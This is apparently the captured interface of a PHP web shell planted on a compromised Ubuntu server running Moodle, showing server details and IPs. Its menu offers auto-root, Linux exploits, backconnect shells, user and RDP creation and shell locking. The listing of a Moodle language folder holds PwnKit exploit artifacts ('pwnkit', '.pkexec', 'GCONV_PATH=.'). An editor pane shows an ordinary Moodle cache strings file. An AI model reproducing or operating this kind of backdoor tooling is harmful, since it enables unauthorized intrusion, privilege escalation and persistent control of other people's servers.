Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
libromaster /
lang /
en /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxrwxrwx
.mad-root
0
B
-rw-r--r--
access.php
1.7
KB
-rwxrwxrwx
admin.php
120.93
KB
-rwxrwxrwx
auth.php
12.49
KB
-rwxrwxrwx
backup.php
16.61
KB
-rwxrwxrwx
badges.php
24.56
KB
-rwxrwxrwx
block.php
4.82
KB
-rwxrwxrwx
blog.php
10.88
KB
-rwxrwxrwx
bulkusers.php
2.15
KB
-rwxrwxrwx
cache.php
9.73
KB
-rwxrwxrwx
calendar.php
10.81
KB
-rwxrwxrwx
cohort.php
2.61
KB
-rwxrwxrwx
completion.php
12.16
KB
-rwxrwxrwx
condition.php
7.58
KB
-rwxrwxrwx
countries.php
8.54
KB
-rwxrwxrwx
currencies.php
6.62
KB
-rwxrwxrwx
dbtransfer.php
1.86
KB
-rwxrwxrwx
debug.php
3.1
KB
-rwxrwxrwx
editor.php
6.73
KB
-rwxrwxrwx
edufields.php
22.9
KB
-rwxrwxrwx
enrol.php
7.73
KB
-rwxrwxrwx
error.php
43.74
KB
-rwxrwxrwx
filters.php
3.87
KB
-rwxrwxrwx
form.php
3.28
KB
-rwxrwxrwx
grades.php
45.54
KB
-rwxrwxrwx
grading.php
5.24
KB
-rwxrwxrwx
group.php
10.37
KB
-rwxrwxrwx
hub.php
18.49
KB
-rwxrwxrwx
imscc.php
2.11
KB
-rwxrwxrwx
install.php
26.06
KB
-rwxrwxrwx
iso6392.php
16.04
KB
-rwxrwxrwx
langconfig.php
2.16
KB
-rwxrwxrwx
license.php
1.36
KB
-rwxrwxrwx
mathslib.php
2.06
KB
-rwxrwxrwx
media.php
3.39
KB
-rwxrwxrwx
message.php
8.06
KB
-rwxrwxrwx
mimetypes.php
2.78
KB
-rwxrwxrwx
mnet.php
20.37
KB
-rwxrwxrwx
moodle.php
113.63
KB
-rwxrwxrwx
my.php
689
B
-rwxrwxrwx
notes.php
2.67
KB
-rwxrwxrwx
pagetype.php
1.91
KB
-rwxrwxrwx
pix.php
1.57
KB
-rwxrwxrwx
plagiarism.php
748
B
-rwxrwxrwx
plugin.php
10.22
KB
-rwxrwxrwx
portfolio.php
14.26
KB
-rwxrwxrwx
pwnkit
10.99
KB
-rwxr-xr-x
question.php
33.99
KB
-rwxrwxrwx
rating.php
3.02
KB
-rwxrwxrwx
repository.php
13.2
KB
-rwxrwxrwx
role.php
25.26
KB
-rwxrwxrwx
search.php
3.58
KB
-rwxrwxrwx
table.php
1.33
KB
-rwxrwxrwx
tag.php
3.97
KB
-rwxrwxrwx
timezones.php
18.44
KB
-rwxrwxrwx
userkey.php
1.98
KB
-rwxrwxrwx
webservice.php
16.75
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : cache.php
<?php // This file is part of Moodle - http://moodle.org/ // // Moodle is free software: you can redistribute it and/or modify // it under the terms of the GNU General Public License as published by // the Free Software Foundation, either version 3 of the License, or // (at your option) any later version. // // Moodle is distributed in the hope that it will be useful, // but WITHOUT ANY WARRANTY; without even the implied warranty of // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the // GNU General Public License for more details. // // You should have received a copy of the GNU General Public License // along with Moodle. If not, see <http://www.gnu.org/licenses/>. /** * Cache language strings * * This file is part of Moodle's cache API, affectionately called MUC. * It contains the components that are requried in order to use caching. * * @package core * @category cache * @copyright 2012 Sam Hemelryk * @license http://www.gnu.org/copyleft/gpl.html GNU GPL v3 or later */ $string['actions'] = 'Actions'; $string['addinstance'] = 'Add instance'; $string['addnewlockinstance'] = 'Add a new lock instance'; $string['addlocksuccess'] = 'Successfully added a new lock instance.'; $string['addstore'] = 'Add {$a} store'; $string['addstoresuccess'] = 'Successfully added a new {$a} store.'; $string['area'] = 'Area'; $string['caching'] = 'Caching'; $string['cacheadmin'] = 'Cache administration'; $string['cacheconfig'] = 'Configuration'; $string['cachedef_calendar_subscriptions'] = 'Calendar subscriptions'; $string['cachedef_config'] = 'Config settings'; $string['cachedef_coursecat'] = 'Course categories lists for particular user'; $string['cachedef_coursecatrecords'] = 'Course categories records'; $string['cachedef_coursecontacts'] = 'List of course contacts'; $string['cachedef_coursecattree'] = 'Course categories tree'; $string['cachedef_databasemeta'] = 'Database meta information'; $string['cachedef_eventinvalidation'] = 'Event invalidation'; $string['cachedef_groupdata'] = 'Course group information'; $string['cachedef_htmlpurifier'] = 'HTML Purifier - cleaned content'; $string['cachedef_locking'] = 'Locking'; $string['cachedef_plugininfo_base'] = 'Plugin info - base'; $string['cachedef_plugininfo_block'] = 'Plugin info - blocks'; $string['cachedef_plugininfo_filter'] = 'Plugin info - filters'; $string['cachedef_plugininfo_mod'] = 'Plugin info - activity modules'; $string['cachedef_plugininfo_portfolio'] = 'Plugin info - portfolios'; $string['cachedef_plugininfo_repository'] = 'Plugin info - repositories'; $string['cachedef_pluginlist'] = 'Plugin list'; $string['cachedef_plugintypes'] = 'Plugin types'; $string['cachedef_questiondata'] = 'Question definitions'; $string['cachedef_repositories'] = 'Repositories instances data'; $string['cachedef_string'] = 'Language string cache'; $string['cachedef_yuimodules'] = 'YUI Module definitions'; $string['cachelock_file_default'] = 'Default file locking'; $string['cachestores'] = 'Cache stores'; $string['component'] = 'Component'; $string['confirmlockdeletion'] = 'Confirm lock deletion'; $string['confirmstoredeletion'] = 'Confirm store deletion'; $string['defaultmappings'] = 'Stores used when no mapping is present'; $string['defaultmappings_help'] = 'These are the default stores that will be used if you don\'t map one or more stores to the cache definition.'; $string['defaultstoreactions'] = 'Default stores cannot be modified'; $string['default_application'] = 'Default application store'; $string['default_request'] = 'Default request store'; $string['default_session'] = 'Default session store'; $string['definition'] = 'Definition'; $string['definitionsummaries'] = 'Known cache definitions'; $string['delete'] = 'Delete'; $string['deletelock'] = 'Delete lock'; $string['deletelockconfirmation'] = 'Are you sure you want to delete the {$a} lock?'; $string['deletelockhasuses'] = 'You cannot delete this lock instance because it is being used by one or more stores.'; $string['deletelocksuccess'] = 'Successfully deleted the lock.'; $string['deletestore'] = 'Delete store'; $string['deletestoreconfirmation'] = 'Are you sure you want to delete the "{$a}" store?'; $string['deletestorehasmappings'] = 'You cannot delete this store because it has mappings. Please delete all mappings before deleting the store'; $string['deletestoresuccess'] = 'Successfully deleted the cache store'; $string['editmappings'] = 'Edit mappings'; $string['editsharing'] = 'Edit sharing'; $string['editstore'] = 'Edit store'; $string['editstoresuccess'] = 'Succesfully edited the cache store.'; $string['editdefinitionmappings'] = '{$a} definition store mappings'; $string['editdefinitionsharing'] = 'Edit definition sharing for {$a}'; $string['ex_configcannotsave'] = 'Unable to save the cache config to file.'; $string['ex_nodefaultlock'] = 'Unable to find a default lock instance.'; $string['ex_unabletolock'] = 'Unable to acquire a lock for caching.'; $string['ex_unmetstorerequirements'] = 'You are unable to use this store at the present time. Please refer to the documentation to determine its requirements.'; $string['gethit'] = 'Get - Hit'; $string['getmiss'] = 'Get - Miss'; $string['invalidlock'] = 'Invalid lock'; $string['invalidplugin'] = 'Invalid plugin'; $string['invalidstore'] = 'Invalid cache store provided'; $string['lockdefault'] = 'Default'; $string['lockingmeans'] = 'Locking mechanism'; $string['lockmethod'] = 'Lock method'; $string['lockmethod_help'] = 'This is the method used for locking when required of this store.'; $string['lockname'] = 'Name'; $string['locknamedesc'] = 'The name must be unique and can only consist of the characters: a-zA-Z_'; $string['locknamenotunique'] = 'The name you have selected is not unique. Please select a unique name.'; $string['locksummary'] = 'Summary of cache lock instances.'; $string['locktype'] = 'Type'; $string['lockuses'] = 'Uses'; $string['mappings'] = 'Store mappings'; $string['mappingdefault'] = '(default)'; $string['mappingprimary'] = 'Primary store'; $string['mappingfinal'] = 'Final store'; $string['mode'] = 'Mode'; $string['modes'] = 'Modes'; $string['mode_1'] = 'Application'; $string['mode_2'] = 'Session'; $string['mode_4'] = 'Request'; $string['nativelocking'] = 'This plugin handles its own locking.'; $string['none'] = 'None'; $string['plugin'] = 'Plugin'; $string['pluginsummaries'] = 'Installed cache stores'; $string['purge'] = 'Purge'; $string['purgedefinitionsuccess'] = 'Successfully purged the requested definition.'; $string['purgestoresuccess'] = 'Successfully purged the requested store.'; $string['requestcount'] = 'Test with {$a} requests'; $string['rescandefinitions'] = 'Rescan definitions'; $string['result'] = 'Result'; $string['set'] = 'Set'; $string['sharing'] = 'Sharing'; $string['sharing_all'] = 'Everyone.'; $string['sharing_input'] = 'Custom key (entered below)'; $string['sharing_help'] = 'This allows you to determine how the cache data can be shared if you have a clustered setup, or if you have multiple sites all set up with the same store and wish to share the data. This is an advanced setting please make sure you understand its purpose before changing it.'; $string['sharing_siteid'] = 'Sites with the same site id.'; $string['sharing_version'] = 'Sites running the same version.'; $string['sharingrequired'] = 'You must select at least one sharing option.'; $string['sharingselected_all'] = 'Everyone'; $string['sharingselected_input'] = 'Custom key'; $string['sharingselected_siteid'] = 'Site identifier'; $string['sharingselected_version'] = 'Version'; $string['storeconfiguration'] = 'Store configuration'; $string['storename'] = 'Store name'; $string['storename_help'] = 'This sets the store name. It is used to identify the store within the system and can only consist of a-z A-Z 0-9 -_ and spaces. It also must be unique. If you attempt to use a name that has already been used you will receive an error.'; $string['storenamealreadyused'] = 'You must choose a unique name for this store.'; $string['storenameinvalid'] = 'Invalid store name. You can only use a-z A-Z 0-9 -_ and spaces.'; $string['storeperformance'] = 'Cache store performance reporting - {$a} unique requests per operation.'; $string['storeready'] = 'Ready'; $string['storenotready'] = 'Store not ready'; $string['storerequiresattention'] = 'Requires attention.'; $string['storerequiresattention_help'] = 'This store instance is not ready to be used but has mappings. Fixing this issue will improve performance on your system. Please check that the store backend is ready to be used and that any PHP requirements are met.'; $string['storeresults_application'] = 'Store requests when used as an application cache.'; $string['storeresults_request'] = 'Store requests when used as a request cache.'; $string['storeresults_session'] = 'Store requests when used as a session cache.'; $string['stores'] = 'Stores'; $string['store_default_application'] = 'Default file store for application caches'; $string['store_default_request'] = 'Default static store for request caches'; $string['store_default_session'] = 'Default session store for session caches'; $string['storesummaries'] = 'Configured store instances'; $string['supports'] = 'Supports'; $string['supports_multipleidentifiers'] = 'multiple identifiers'; $string['supports_dataguarantee'] = 'data guarantee'; $string['supports_nativettl'] = 'ttl'; $string['supports_nativelocking'] = 'locking'; $string['supports_keyawareness'] = 'key awareness'; $string['supports_searchable'] = 'searching by key'; $string['tested'] = 'Tested'; $string['testperformance'] = 'Test performance'; $string['unsupportedmode'] = 'Unsupported mode'; $string['untestable'] = 'Untestable'; $string['userinputsharingkey'] = 'Custom key for sharing'; $string['userinputsharingkey_help'] = 'Enter your own private key here. When you set up other stores on other sites you wish to share data with make sure you set the exact same key there.';
Close